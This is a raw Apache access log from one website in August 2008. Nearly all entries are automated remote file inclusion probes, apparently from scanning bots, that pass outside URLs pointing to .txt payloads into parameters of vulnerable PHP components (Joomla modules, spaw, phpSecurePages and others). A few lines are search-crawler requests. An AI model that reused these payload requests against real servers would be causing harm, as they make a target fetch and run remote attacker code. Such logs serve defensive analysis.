200.203.121.1 - - [19/Aug/2008:09:48:24 -0700] "GET /logs/index.php?body=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [19/Aug/2008:09:48:24 -0700] "GET /logs/access_080630.log/index.php?body=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [19/Aug/2008:09:48:24 -0700] "GET /logs/access_080208.log/index.php?body=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [19/Aug/2008:09:48:25 -0700] "GET /index.php?body=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 200 9872 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:09:48:38 -0700] "GET /logs/access_071126.log HTTP/1.0" 200 40511 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:48:41 -0700] "GET /logs/access_080808.log/SQuery/lib/gore.php?libpath=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:48:41 -0700] "GET /SQuery/lib/gore.php?libpath=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:48:42 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.203.121.1 - - [19/Aug/2008:09:48:50 -0700] "GET /logs/access_080324.log/index.php?body=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:49:00 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:49:00 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:49:11 -0700] "GET /logs/access_080720.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
80.13.168.195 - - [19/Aug/2008:09:49:14 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.13.168.195 - - [19/Aug/2008:09:49:14 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.13.168.195 - - [19/Aug/2008:09:49:14 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.13.168.195 - - [19/Aug/2008:09:49:14 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [19/Aug/2008:09:49:15 -0700] "GET /logs//admin/includes/admin_header.php?level=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [19/Aug/2008:09:49:15 -0700] "GET //admin/includes/admin_header.php?level=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:49:17 -0700] "GET /logs/access_080806.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
80.13.168.195 - - [19/Aug/2008:09:49:26 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.13.168.195 - - [19/Aug/2008:09:49:29 -0700] "GET /logs/access_080728.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.253.176 - - [19/Aug/2008:09:49:46 -0700] "GET /logs/access_080630.log/phpSecurePages/secure.php?&cfgProgDir=http://www.klubindia.com/adm/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.253.176 - - [19/Aug/2008:09:49:46 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.klubindia.com/adm/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.253.176 - - [19/Aug/2008:09:49:46 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://www.klubindia.com/adm/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:09:49:56 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_27/ HTTP/1.0" 200 1617 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:09:50:05 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://www.talksurrey.ca/net/ngibul/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:09:50:05 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.talksurrey.ca/net/ngibul/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:09:50:30 -0700] "GET /logs/?D=A HTTP/1.0" 200 61268 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:50:55 -0700] "GET /SQuery/lib/gore.php?libpath=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.129.97.30 - - [19/Aug/2008:09:50:58 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [19/Aug/2008:09:50:58 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [19/Aug/2008:09:50:58 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [19/Aug/2008:09:51:02 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:51:11 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 200 61284 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:51:12 -0700] "GET /?DOCUMENT_ROOT=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 200 9908 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:51:20 -0700] "GET /logs/access_080723.log/?DOCUMENT_ROOT=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:51:21 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:51:21 -0700] "GET /?DOCUMENT_ROOT=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9877 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:51:22 -0700] "GET //index.php?option=com_custompages&cpage=http://bugise.com/id1.txt?? HTTP/1.1" 200 9887 "-" "libwww-perl/5.803" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:51:35 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:51:35 -0700] "GET //skin/zero_vote/error.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:51:36 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:51:36 -0700] "GET /logs/access_080214.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:51:38 -0700] "GET /logs/access_080624.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:51:39 -0700] "GET /logs/access_080121.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:51:59 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:52:00 -0700] "GET //skin/zero_vote/error.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:52:00 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:09:52:01 -0700] "GET /logs/access_080408.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:52:08 -0700] "GET /logs/access_080201.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:52:14 -0700] "GET /logs/access_080124.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:52:16 -0700] "GET /logs/access_080730.log//skin/zero_vote/errors.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:52:16 -0700] "GET /logs/access_080211.log//skin/zero_vote/error.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:52:16 -0700] "GET //skin/zero_vote/errors.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.92.23.89 - - [19/Aug/2008:09:52:27 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:09:52:48 -0700] "GET /logs/access_080330.log//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:09:52:48 -0700] "GET //sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:09:52:48 -0700] "GET /logs//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:52:49 -0700] "GET /logs/access_080324.log//skin/zero_vote/ask_password.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:52:49 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:53:00 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:53:04 -0700] "GET /logs/access_080411.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:53:05 -0700] "GET /logs/access_080324.log//skin/zero_vote/ask_password.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:53:06 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:53:06 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:53:09 -0700] "GET /logs/access_080630.log/phpSecurePages/secure.php?&cfgProgDir=http://www.saddlebrookhorsecenter.com/Events///////////ws/gabungan.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:53:09 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.saddlebrookhorsecenter.com/Events///////////ws/gabungan.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:53:09 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://www.saddlebrookhorsecenter.com/Events///////////ws/gabungan.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:53:11 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:53:12 -0700] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:53:17 -0700] "GET /logs/access_080109.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:09:53:18 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://www.talksurrey.ca/net/ngibul/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:09:53:18 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.talksurrey.ca/net/ngibul/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:09:53:19 -0700] "GET //modules/xfsection/modify.php?dir_module=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:53:20 -0700] "GET /logs/access_080627.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:53:24 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:53:34 -0700] "GET //skin/zero_vote/error.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.25.170.22 - - [19/Aug/2008:09:53:48 -0700] "GET /logs/index.php?body=http://69.89.27.230/~williamd/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.25.170.22 - - [19/Aug/2008:09:53:50 -0700] "GET /index.php?body=http://69.89.27.230/~williamd/id2.txt?? HTTP/1.1" 200 9874 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:09:53:57 -0700] "GET /logs/access_080227.log//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:54:04 -0700] "GET //skin/zero_vote/error.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:54:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:54:05 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:54:07 -0700] "GET /logs/access_080630.log/phpSecurePages/secure.php?&cfgProgDir=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:54:08 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:54:08 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:54:11 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:54:12 -0700] "GET //skin/zero_vote/errors.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:54:48 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:54:48 -0700] "GET //skin/zero_vote/errors.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:54:48 -0700] "GET /logs/access_080324.log//skin/zero_vote/errors.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:54:50 -0700] "GET /logs//skin/zero_vote/errors.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:54:51 -0700] "GET /logs/access_080324.log//skin/zero_vote/errors.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:54:52 -0700] "GET //skin/zero_vote/errors.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:54:52 -0700] "GET /logs//skin/zero_vote/errors.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:55:02 -0700] "GET /logs/access_080207.log//skin/zero_vote/errors.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:55:30 -0700] "GET /logs/access_080324.log//skin/zero_vote/ask_password.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:55:30 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:55:31 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.198.38 - - [19/Aug/2008:09:55:33 -0700] "GET /logs/index.php?body=http://69.89.27.230/~williamd/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.198.38 - - [19/Aug/2008:09:55:34 -0700] "GET /logs/index.php?body=http://69.89.27.230/~williamd/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.198.38 - - [19/Aug/2008:09:55:34 -0700] "GET /index.php?body=http://69.89.27.230/~williamd/id2.txt?? HTTP/1.1" 200 9874 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.198.38 - - [19/Aug/2008:09:55:35 -0700] "GET /index.php?body=http://69.89.27.230/~williamd/id2.txt?? HTTP/1.1" 200 9874 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:55:35 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://albforum.freehostia.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:09:55:49 -0700] "GET /logs/access_080207.log//skin/zero_vote/errors.php?dir=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.41 - - [19/Aug/2008:09:55:54 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 200 61289 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [19/Aug/2008:09:55:57 -0700] "GET //?path%5Bdocroot%5D=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 200 9887 "-" "libwww-perl/5.803" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:56:00 -0700] "GET /logs/access_080720.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:56:03 -0700] "GET /logs/access_080806.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:56:21 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:56:22 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.197.234.53 - - [19/Aug/2008:09:56:27 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:56:33 -0700] "GET /logs/access_080105.log/SQuery/lib/gore.php?libpath=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.197.234.53 - - [19/Aug/2008:09:56:34 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.197.234.53 - - [19/Aug/2008:09:56:35 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
212.92.23.89 - - [19/Aug/2008:09:56:46 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:56:47 -0700] "GET /logs/access_080626.log/phpSecurePages/secure.php?&cfgProgDir=http://www.saddlebrookhorsecenter.com/Events///////////ws/gabungan.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
